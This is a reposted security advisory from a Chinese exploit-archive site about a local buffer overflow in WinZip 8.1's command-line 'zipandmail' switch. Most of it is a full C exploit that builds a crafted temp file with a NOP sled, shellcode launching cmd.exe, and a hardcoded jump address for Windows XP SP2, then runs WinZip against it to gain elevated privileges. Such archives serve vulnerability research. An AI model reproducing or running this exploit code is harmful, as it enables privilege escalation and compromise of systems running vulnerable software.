首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
WinZip Local Buffer Overflow
来源:atmacasoft.com 作者:ATmaCA 发布时间:2005-06-10  

WinZip Local Buffer Overflow (Exploit)

Summary
WinZip is - "The original and most popular of all Windows Zip file utilities."

By zipping a file with the zipandmail switch of WinZip command line tool, a local user can gain elevated privileges by exploiting a buffer overflow in the program.

Credit:
The information has been provided by ATmaCA.
The original article can be found at: http://securitytracker.com/alerts/2004/Sep/1011132.html

Details
Vulnerable Systems:
* WinZip version 8.1

Immune Systems:
* WinZip version 9.0 SR-1

Exploit:
/*
*
* WinZip Command Line Local Buffer Overflow
* http://securitytracker.com/alerts/2004/Sep/1011132.html
* http://www.winzip.com/wz90sr1.htm
* Exploit coded By ATmaCA
* Web: atmacasoft.com && spyinstructors.com
* E-Mail: atmaca at icqmail
* Credit to kozan
*
*/

/*
*
* Tested with WinZip 8.1 on Win XP Sp2 En
* Bug Fixed on WinZip 9.0 Service Release 1 (SR-1)
* http://www.winzip.com/wz90sr1.htm
*
*/

#include <windows.h>
#include <stdio.h>

#define NOP 0x90

void main()
{
// create crafted command line
char tmpfile[] = "c:\\wzs45.tmp";
char winzippath[] = "C:\\Program Files\\WINZIP\\winzip32.exe";
char zipandmailpar[] = " -* /zipandmail /@ ";
char runpar[300];
int i = 0;
strcpy(runpar,winzippath);
strcat(runpar,zipandmailpar);
strcat(runpar,tmpfile);

// need for some input file name .tmp but not must to exist
char inputfile[] = "C:\\someinputfile.ext\n";

// launch a local cmd.exe
char shellcode[] =
"\x55\x8B\xEC\x33\xFF"
"\x57\x83\xEC\x04\xC6\x45\xF8"
"\x63\xC6\x45\xF9\x6D\xC6\x45"
"\xFA\x64\xC6\x45\xFB\x2E\xC6"
"\x45\xFC\x65\xC6\x45\xFD\x78"
"\xC6\x45\xFE\x65\xB8"
"\xC7\x93\xC2\x77" //77C293C7 system() - WinXP SP2 - msvcrt.dll
"\x50\x8D\x45\xF8\x50"
"\xFF\x55\xF4";

// create crafted .tmp file
FILE *di;
if( (di=fopen(tmpfile,"wb")) == NULL ){
return;
}

for(i=0;i<sizeof(inputfile)-1;i++)
fputc(inputfile[i],di);

fprintf(di,"c:\\");

for(i=0;i<384;i++)
fputc(NOP,di);


for(i=0;i<sizeof(shellcode)-1;i++)
fputc(shellcode[i],di);

fprintf(di,"\xBF\xAC\xDA\x77"); //EIP - WinXp Sp2 Eng - jmp esp addr
fprintf(di,"\x90\x90\x90\x90"); //NOPs
fprintf(di,"\x90\x83\xEC\x74"); //sub esp,0x74
fprintf(di,"\xFF\xE4\x90\x90"); //jmp esp

fprintf(di,"\n");

fclose(di);
WinExec(runpar,SW_SHOW);
}



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Tcpdump bgp_update_print() Rem
·GNU Mailutils imap4d Remote Pr
·Ipswitch IMAP Server LOGIN Com
·WebHints Remote Command Execut
·Kaspersky AntiVirus 5.x klif.s
·Invision Power Board SQL Injec
·Invision Power Board SQL Injec
·Ipswitch IMail IMAP Buffer Ove
·FutureSoft TFTP Server 2000 Bu
·MacOS X launchd Race Condition
·CrobFTP Remote Stack Overflow
·Mambo Remote Password Hash Ret
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved